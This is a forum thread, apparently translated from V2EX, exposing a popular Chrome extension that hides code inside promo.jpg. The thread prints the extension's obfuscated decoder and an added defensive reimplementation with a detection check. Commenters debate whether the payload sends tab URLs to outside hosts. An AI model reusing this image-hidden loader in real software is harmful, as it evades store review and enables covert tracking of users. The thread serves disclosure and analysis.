V2EX
The browser

Notice that Chrome’s User-Agent Switcher is a Trojan horse

Search the Chrome Store for User-Agent Switcher: the top plugin in the results (450,000 users) is a Trojan horse…

chrome.google.com/webstore/de…

To get around Chrome’s moderation policies, he hid the malicious code in promo.jpg

Line 80 of background.js decrypts the malicious code from the image and executes it

```javascript
// Line 80 of background.js: loads promo.jpg into a hidden canvas, reads the
// pixel data back and unpacks a string from it (the code the post refers to).
t.prototype.Vh = function(t, e) {
    if ("" === '../promo.jpg') return "";
    void 0 === t && (t = '../promo.jpg'), t.length && (t = r.Wk(t)), e = e || {};
    var n = this.ET, i = e.mp || n.mp, o = e.Tv || n.Tv, h = e.At || n.At,
        a = r.Yb(Math.pow(2, i)), f = (e.WC || n.WC, e.TY || n.TY),
        u = document.createElement("canvas"), p = u.getContext("2d");
    if (u.style.display = "none", u.width = e.width || t.width, u.height = e.width || t.height, 0 === u.width || 0 === u.height) return "";
    e.height && e.width ? p.drawImage(t, 0, 0, e.width, e.height) : p.drawImage(t, 0, 0);
    // raw RGBA bytes of the drawn image
    var c = p.getImageData(0, 0, u.width, u.height), d = c.data, g = [];
    if (c.data.every(function(t) { return 0 === t })) return "";
    var m, s;
    // walk the alpha byte of every pixel (offset 3, stride 4) and collect small values
    if (1 === o) for (m = 3, s = !1; !s && m < d.length && !s; m += 4) s = f(d, m, o), s || g.push(d[m] - (255 - a + 1));
    // pack i bits per sample into h-bit character codes
    var v = "", w = 0, y = 0, l = Math.pow(2, h) - 1;
    for (m = 0; m < g.length; m += 1) w += g[m] << y, y += i, y >= h && (v += String.fromCharCode(w & l), y %= h, w = g[m] >> i - y);
    return v.length < 13 ? "" : (0. == w && (v += String.fromCharCode(w & l)), v)
}
```
It encrypts the URL of every tab you open and sends it to uaswitcher.org/logic/page/…
In addition, it fetches promotion link rules from api.data-monitor.info/api/bhrule?…; when you open a site that matches those rules, it inserts ads or even malicious code into the page.
Going by ThreatBook (x.threatbook.cn/domain/api…), I guess the following plugins are the work of the same author:

chrome.google.com/webstore/de…

chrome.google.com/webstore/de…

chrome.google.com/webstore/de…

chrome.google.com/webstore/de…

Someone is also discussing this at news.ycombinator.com/item?id=148…
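To let an analyst reproduce what line 80 does without running the extension, here is an added example (not code from the extension or from anyone in the thread) that mirrors the alpha-channel unpacking on constructed RGBA data and adds a triage check. It assumes r.Yb(x) is the identity, that the unknown stop function simply ends at the first alpha byte below the carrier range, and uses 2 bits per sample and 8 bits per character for the i and h parameters, which the post does not give.

```javascript
// Assumed parameters (the post does not state the real i and h values).
const BITS_PER_SAMPLE = 2; // i: bits hidden in each pixel's alpha byte
const BITS_PER_CHAR = 8;   // h: bits per output character

// Mirror of the decoder on line 80: read the alpha byte of every pixel, map it
// back to a small integer, then pack those integers little-endian into chars.
function extractAlphaPayload(rgba, i = BITS_PER_SAMPLE, h = BITS_PER_CHAR) {
  const base = 256 - (1 << i);          // the "255 - a + 1" offset with a = 2**i
  const samples = [];
  for (let m = 3; m < rgba.length; m += 4) {
    const v = rgba[m] - base;
    if (v < 0) break;                   // assumed stop rule for the unknown f()
    samples.push(v);
  }
  let out = "", w = 0, y = 0;
  const mask = (1 << h) - 1;
  for (const s of samples) {
    w += s << y;
    y += i;
    if (y >= h) {
      out += String.fromCharCode(w & mask);
      y %= h;
      w = s >> (i - y);
    }
  }
  return out.length < 13 ? "" : out;    // the extension discards short results
}

// Triage check: a JPEG drawn on a canvas has alpha 255 for every pixel, so an
// "opaque" image whose alpha values vary just below 255 deserves a closer look.
function alphaCarrierSuspect(rgba, i = BITS_PER_SAMPLE) {
  const base = 256 - (1 << i);
  let varying = 0;
  for (let m = 3; m < rgba.length; m += 4) {
    if (rgba[m] !== 255 && rgba[m] >= base) varying++;
  }
  return varying > 0;
}

// Constructed test input only: build pixel data that carries a known string
// under the same scheme, so the decoder has something to recover offline.
function buildSample(text, i = BITS_PER_SAMPLE, h = BITS_PER_CHAR) {
  const base = 256 - (1 << i), pixels = [];
  for (const ch of text) {
    for (let b = 0; b < h; b += i) {
      const v = (ch.charCodeAt(0) >> b) & ((1 << i) - 1);
      pixels.push(0, 0, 0, base + v);   // RGB irrelevant, alpha carries the bits
    }
  }
  return Uint8ClampedArray.from(pixels);
}
```

Run under Node; `extractAlphaPayload(buildSample("hello, world!"))` recovers the string, while fully opaque pixel data is not flagged and decodes to nothing.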

gzlock (via Android, ♥ 2): Really changing the agent… get up and delete it quickly
kmahyyg: Oh my God, let me go back and check
sunbeams001 (2 days ago): That's horrible
Antidictator (via Android): Wiping it..
t123yh (via Android): This is freaking scary
torbrowserbridge (via Android): I wiped it 2 days ago, probably already financial freedom
whwq2012: Thankfully, I’ve long since stopped using the UA toggle tool
ahhui: Oh my God, get up and delete it
houbaron (via Android): I’m using it right now… What are the alternatives?
torbrowserbridge: How did you find that out? Cool
wave3c (2 days ago): Used it for years, scary
mylanch (via iPhone, 2 days ago): What will Google officially do?
liyiecho (♥ 4): I am using Google's User-Agent Switcher for Chrome

@houbaron #9 chrome.google.com/webstore/de…
dong3580 (via Android): I deleted this one once and replaced it with another one. I’m afraid I’ll have to delete them all. What about the Firefox one with the same name?

@liyiecho This is actually the official one; fortunately 😂 I didn't get hit,
Cambrian07 (2 days ago): @liyiecho After deleting it, I found that mine was also provided by Google, and silently installed it again…
crystom (2 days ago): I fell for it. Fortunately, I only enabled this extension when using it
anoymoux (2 days ago): @dong3580 Firefox isn’t secure either: most of the add-ons this guy wrote are available for Firefox and Opera, and the few I’ve listed have over a million users on Chrome alone
anoymoux: Alas, I’ve had this plugin installed for years, and it’s disgusting to think it was monitored by this Russian hacker…
qlbr (2 days ago): chrome.google.com/webstore/de…

Excuse me, is it this one? No ladder, really anxious
honk (via Android): Add dev tools by yourself
akwIX (2 days ago): @qlbr #19 Yes
akwIX: I was using this one two days ago

chrome.google.com/webstore/de…
crisfun (via iPhone): Will check it out tonight
doubleflower (2 days ago): Try not to install mods written by Russians…
infun (2 days ago): @Cambrian07 orz +1
lpy6759 (2 days ago): Can deleting the code solve the Trojan horse?
lantianqiren: Nice guy
deeporist (2 days ago): I was surprised. Luckily, I use Smart Header for Chrome, but I still have one in Firefox. It looks like the author is a jerk and I deleted it immediately

However, I have almost never used the FF one, and instead changed the UA directly with uMatrix
fzhw88 (via Android, 2 days ago): @liyiecho That’s what I use, too
qa2080639 (2 days ago): Deleted it…
zro (2 days ago): Fortunately, none of these Chrome add-ons were installed

@deeporist #28 On FF I used this one: addons.mozilla.org/en-US/firef…
zhuziyi: Oh my God, uninstall first out of respect, then come back and check it further.
dong3580 (2 days ago): @zro

I have this on Firefox, I don’t know if it’s a problem,
paradoxs: Browser extensions don’t have too many permissions, they automatically update, and I don’t open anything except the super important extensions.
ihciah (via iPhone): A lot of plugins have been bought and had backdoor code inserted. Previously, in one seemingly called Web Timer, I found it always jumped to rebate links; checking the source surprised me.
shiloh77 (2 days ago): What was the author’s name on Firefox?

A little scared that I installed his plugin myself…

Thanks LZ
ynyounuo: Unfortunately, I’m afraid many people have been poisoned for a year and a half. /t/263719
jfdnet: Remember there was a special article about this before: several famous mods were sold and then reinvented
xujinkai (2 days ago): I was so scared that I disabled all the plugins I don’t use
lechain (2 days ago): I've been using SwitchyOmega, will it be ok?
zuolan (2 days ago): Horrible, thanks for the exposure.
hjdtl (2 days ago): Contacted Chrome
salary123 (via Android): This was long before anyone found out. Thankfully, it’s not on a popular browser
saran (via Android): No cameo appearance with the baby (jun °3° jun)
ghost444 (1 day ago): @anoymoux AMO extensions are manually reviewed and certainly better than the Chrome Web Store…
iyangfei (1 day ago): I didn’t use this
UnisandK (1 day ago): Oh my God
EchoChan (1 day ago): @qlbr That’s what I’m talking about.
Clooody (1 day ago): If it's true, go to the Google store and report it, lest later people suffer.
showgood163 (via Android): Thanks for the reminder. These extensions are not currently in use?
doubleflower (1 day ago): There are thousands of NPM packages on my computer. If one of them wanted to do something bad, or the NPM account was stolen… that does more damage than a plugin.
7654: I use Firefox and host the User Agent Overrider extension on GitHub
mjar (1 day ago): I’d like to see what that picture looks like…
mjar (1 day ago): [image: promo.jpg]
usedname (1 day ago): I wiped it. I used this one: chrome.google.com/webstore/de…

The name was only slightly off
Izual_Yang (via Android, 1 day ago): @deeporist When I installed uMatrix, I confused it with UA, and then I went up and down zhihu
hvanke (1 day ago): @dong3580

This is what LZ gave: chrome.google.com/webstore/de…

I think that’s the official one: chrome.google.com/webstore/de…

Not the same one, right?
hantsy: I am using Proxy SwitchyOmega
ynyounuo (1 day ago): @hantsy It’s not the same thing
popok (1 day ago): @deeporist #28 Ha ha, I use Smart Header too
redsonic (1 day ago): Can LZ post the JS from the picture directly?
lslqtz (1 day ago): Oh my God. I was using it
MaxMadcc (1 day ago): I also want to know what was done after decrypting the image
lslqtz (1 day ago): background.js

Line 80, I think I can get rid of that
jeffson (1 day ago): Terrible
lslqtz (1 day ago): Changed those places and submitted a links-only one for myself
U2FsdGVkX1 (1 day ago): Have been using djflhoibgkdhkhhcedjiklpkjnoahfmg

Provided by Google
xifangczy (1 day ago): Shit. That’s what I use… But because it adds a lot of entries to the right-click menu that can't be turned off, I usually keep it disabled.
Tony2ee (1 day ago): I saw this

chrome.google.com/webstore/de…

Uninstall malware and complain about malware…

Feeling guilty…
asdwddd (1 day ago): This was the one that worked

User-Agent Switcher for Chrome

offered by google.com

Hackers are…
jliangchan (1 day ago): Reported it as malicious software in the Chrome store. Rogue extensions are really not easy to find; operators/DNS/plugins may all hijack rebate links, so it is difficult to pin down who is the problem.
fhefh (1 day ago): Just over 60 people read their own book
exoticknight (1 day ago): Thank you, uninstalled
liaoyaoheng (1 day ago): Reported it, doing my part.
schema: Thanks for sharing ~
172055 (1 day ago): Last year…
yukiww233 (1 day ago): I was scared to death when I found out I was using the Google one. Reported it
skadi (via Android): Has never used it…
hantsy (1 day ago): @ynyounuo Sorry, I didn’t get a good look.
drwx (1 day ago): I used a Header Hacker plugin; it has the same author as Google’s official plugin, but it doesn’t have a built-in list of UAs, so I need to add them myself, but the interface looks a little easier. .
tbag781623489 (via iPhone): Thank you, no wonder some foreign promotions often pop up. I’ll have to write it myself
MaxMadcc (1 day ago): @anoymoux Does this plugin only upload tab URL information?
achendian2 (1 day ago): Horrible, deleted
LuoboTixS (1 day ago): For a free hot plugin at the head of the Chrome store ranking, if it is updated perennially while its functionality has long been mature and shaped, one should consider whether there is a backdoor risk of stolen data or even changed page content (advertising jumps), or do the devs live on air?

The English internet also has a lot of pseudo tool software (advertising Trojans) that lures clicks and downloads via SEO on universal keywords and can make the browser plugin bleed from seven orifices, but without reporting it as a virus it is difficult to locate
kappa (1 day ago): Using chrome.google.com/webstore/de…

offered by google.com
xcc880 (1 day ago): 0.0 had it installed for a long time
acess (1 day ago): Why did this look familiar to me:

Chrome extensions are being sold to have malicious code added

www.solidot.org/story?mode=…
Kingfree (1 day ago): How come this guy had a problem and didn’t get reported?
xspoco (1 day ago): I faked it. Just delete it.
redsonic (1 day ago): Did a little digging, didn’t find any data leaked to that domain.

The t.prototype.Vh call has no arguments, resulting in

```javascript
if (u.style.display = "none", u.width = e.width || t.width, u.height = e.width || t.height, 0 === u.width || 0 === u.height) return "";
```

returning directly, and there is no way of knowing where the hack code is hidden in the image

Even if this statement is commented out, the canvas has nothing drawn, so d is all zeros

```javascript
var c = p.getImageData(0, 0, u.width, u.height),
    d = c.data,
    g = [];
if (c.data.every(function(t) {
    return 0 === t
})) return "";
```

which finally also returns, so the decoding after it can't be reached. LZ should share how he knew what was in there. I’m not speaking for the plugin, just want to know the actual damage; loading an image and then running a large chunk of obfuscated code is not good.
15015613 (♥ 1, 1 day ago): @zro

@shiloh77

User Agent Switcher (addons.mozilla.org/en-US/firef…)

This is open source. The source code is here: github.com/chrispederi…
lingaoyi (via iPhone): So scary….
Haiwx (1 day ago): @15015613 Last updated January 4, 2011, Manual Stall
cyg07 (1 day ago): @redsonic 360 has the uploaded information in its analysis report

mp.weixin.qq.com/s?__biz=MzU…
xi_lin (1 day ago): I won the lottery
redsonic (1 day ago): @cyg07 cert.360.cn/warning/det…

There was no hash, no signature, no mention of what was hidden in the image or where. I actually verified the plugin, and line 80 did load promo.jpg, but it returned immediately. It may actually be much less harmful.
anoymoux (♥ 1, 21 hours 16 minutes ago): @redsonic After all that effort to hide the code in the image, how could it just return without executing it… If you extract that line and debug-trace it, you can see that the following two pieces of code are decrypted

pastebin.com/ZYd82Hkm

pastebin.com/gXV094wm

Despite the obfuscation, it’s still easy to see the Trojan’s behavior… The author is still very cunning: the monitoring module will not trigger right after installation, only 24 hours later.

In addition, Chrome’s F12 Network panel does not show requests sent by extensions, which is why many malicious extensions can survive for so long… To see a request sent by an extension, go to chrome://extensions -> Background page and select Network
redsonic (20 hours 26 minutes ago): @anoymoux

d=c.data,g=[]; console.log(d) prints all zeros, and then it returns, so it should decrypt when the picture is displayed. I have been capturing packets for two days, but did not catch the url request. You just open a tab and you get it?
redsonic (18 hours 40 minutes ago): @anoymoux Thanks, you can debug the code directly in Extensions, but the first getImageData is all 0, and the second time it's ok. I pulled that out and it returns no matter how you debug it. However, the de-obfuscated code did not send anything; inside the loop there is an exit after a period, it should still need some conditions.
redsonic (18 hours 22 minutes ago): What was this part: pastebin.com/gXV094wm

The code I decoded is this part: pastebin.com/ZYd82Hkm

@anoymoux